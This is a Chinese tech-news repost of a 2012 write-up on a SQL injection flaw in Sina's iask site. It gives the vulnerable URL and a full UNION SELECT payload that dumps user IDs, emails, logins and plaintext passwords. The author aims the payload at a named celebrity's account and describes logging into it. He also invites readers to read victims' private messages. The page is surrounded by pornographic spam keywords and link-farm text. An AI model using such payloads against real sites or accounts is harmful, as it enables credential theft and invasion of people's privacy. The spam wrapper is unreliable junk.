成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

2012年新浪微博用戶密碼明文泄露漏洞

安全 數(shù)據(jù)安全
新浪網(wǎng)iask存在sql注射漏洞,利用漏洞可讀取iask數(shù)據(jù)庫(kù)內(nèi)內(nèi)容。包括明文密碼在內(nèi)的7000多W新浪用戶信息。

相關(guān)廠商:www.sina.com

作者:http://weibo.com/evilniang

發(fā)現(xiàn)時(shí)間:2012-1-1

漏洞類型:sql注射

危害等級(jí):高

漏洞狀態(tài):已修復(fù)

首先申明:該漏洞發(fā)現(xiàn)后本人已聯(lián)系新浪官方修復(fù)漏洞,目前漏洞以修補(bǔ)。文章內(nèi)容公布,僅供參考學(xué)習(xí)。 新浪網(wǎng)iask存在sql注射漏洞,利用漏洞可讀取iask數(shù)據(jù)庫(kù)內(nèi)內(nèi)容。包括明文密碼在內(nèi)的7000多W新浪用戶信息。

漏洞存在點(diǎn):

http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式: http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+

UNION+ALL+SELECT+%28SELECT+

concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+

%60whatis%60.user+

where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

這里我們通過構(gòu)造數(shù)據(jù)庫(kù)查詢語(yǔ)句獲得用戶uid=1303977362的uid、login、email、passwd等信息。

通過修改字段還可以獲取其他信息 。 直接舉個(gè)例子比如我們通過新浪微波查找到劉謙,點(diǎn)擊他的個(gè)人資料。我們可以再瀏覽器地址欄處看到劉謙的uid(新浪用戶數(shù)字id),此處uid為12715428867

直接構(gòu)造地址:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+

UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,

0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+

LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

直接獲得劉謙的賬號(hào)和密碼

這里賬號(hào)是luchenmagic密碼為2lo*****(保密) 嘗試登陸

成功登陸。劉謙微薄。這里你可以看看你的偶像的各種私信,聊天記錄之類的。 接下來(lái)的事情你可以自由發(fā)揮了。但是對(duì)于一個(gè)黑客而言,這只不過是一個(gè)開始而已(這里我并無(wú)惡意,拿劉謙的賬號(hào)來(lái)測(cè)試只是為了致敬,希望有機(jī)會(huì)能夠見證奇跡!)。

后話:

1.2011年年底的csdn、天涯等用戶庫(kù)的泄露只不過是冰山一腳。

2.新浪在csdn、天涯等用戶庫(kù)泄露后申稱新浪數(shù)據(jù)庫(kù)并沒有泄露,而且密碼是密文保存。這里要提出質(zhì)疑了,數(shù)據(jù)庫(kù)密碼明明是明文保存。至少iask中大部分用戶是明文保存密碼(部分用戶查不到密碼)。至于用戶信息是否泄露,這個(gè)不用說了把?

3.網(wǎng)絡(luò)泄密涉及到太多。不管是普通網(wǎng)民,還是明星名人,都被牽涉進(jìn)來(lái)。這里測(cè)試不少明星,基本上都能通過微薄獲取他們的私人信息,甚至登陸他們的msn。(香港爆料雜志來(lái)找我把。開個(gè)玩笑。。。)

4.這個(gè)漏洞發(fā)現(xiàn)后我便通知了新浪官方,新浪在漏洞反饋和應(yīng)急處理這方面做的不夠快。收到漏洞后連給我回個(gè)郵件或者表示感謝都沒有。(我是無(wú)私奉獻(xiàn)白帽子,被活雷鋒了。)

5.祝新年快樂。

 

【編輯推薦】

  1. 神秘黑客再襲FBI合作網(wǎng)站 或?qū)l(fā)起更多襲擊
  2. 黑客相互結(jié)盟鎖定世界各國(guó)政府網(wǎng)站
責(zé)任編輯:王文文 來(lái)源: 游俠安全網(wǎng)
相關(guān)推薦

2012-01-05 10:38:32

2013-08-20 10:46:29

2012-07-12 15:00:26

漏洞賬號(hào)錯(cuò)亂新浪微博

2011-12-26 12:05:43

密碼加密新浪微博

2014-11-04 10:30:32

新浪微博可登錄任意賬戶

2020-12-01 15:35:06

Web安全明文密碼漏洞

2013-07-10 14:15:38

php新浪微博

2014-12-25 18:10:05

2011-11-10 16:59:26

當(dāng)當(dāng)網(wǎng)安全漏洞用戶資料

2015-01-21 15:28:16

Android源碼新浪微博

2011-12-08 16:10:18

2013-07-01 18:34:47

個(gè)推案例新浪微博

2011-07-22 10:38:55

HTC新浪Facebook

2012-01-05 10:25:04

2011-12-08 16:31:43

新浪微博開放平臺(tái)

2011-12-08 16:51:55

新浪微博開放平臺(tái)

2012-04-05 11:24:51

2015-09-24 18:08:50

微博架構(gòu)架構(gòu)演進(jìn)架構(gòu)

2013-03-20 10:09:22

微博風(fēng)云大數(shù)據(jù)社會(huì)化數(shù)據(jù)分析

2011-08-30 14:48:02

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 久久99精品国产自在现线小黄鸭 | 激情五月婷婷丁香 | 精品国产乱码久久久久久蜜柚 | 精品日韩一区二区 | 亚洲人成人一区二区在线观看 | 成人免费视频7777777 | 成人精品免费视频 | 中文字幕亚洲一区二区三区 | www国产亚洲精品久久网站 | 久草综合在线 | 久亚州在线播放 | 欧美一区二区三区日韩 | www97影院 | 国产99热在线 | 成人免费xxxxx在线视频 | 国产区在线观看 | 99久久久无码国产精品 | 久草院线 | 国产一区精品在线 | 国产乡下妇女做爰 | 秋霞电影一区二区 | 精品亚洲第一 | 日韩精品久久久 | 一级黄色片美国 | 亚洲一区中文字幕 | 国产精品久久久久久久午夜片 | 亚洲精品二区 | 黄色av网站在线观看 | 综合网伊人 | 亚洲一区二区精品视频 | 免费成人高清在线视频 | 成人日b视频 | 蜜桃免费av| 亚洲精品一区二区网址 | 亚洲日本中文字幕在线 | 黄色网址在线免费观看 | 在线观看www视频 | 午夜精品福利视频 | 91福利网 | 色婷婷av99xx | 久久99精品久久久久久 |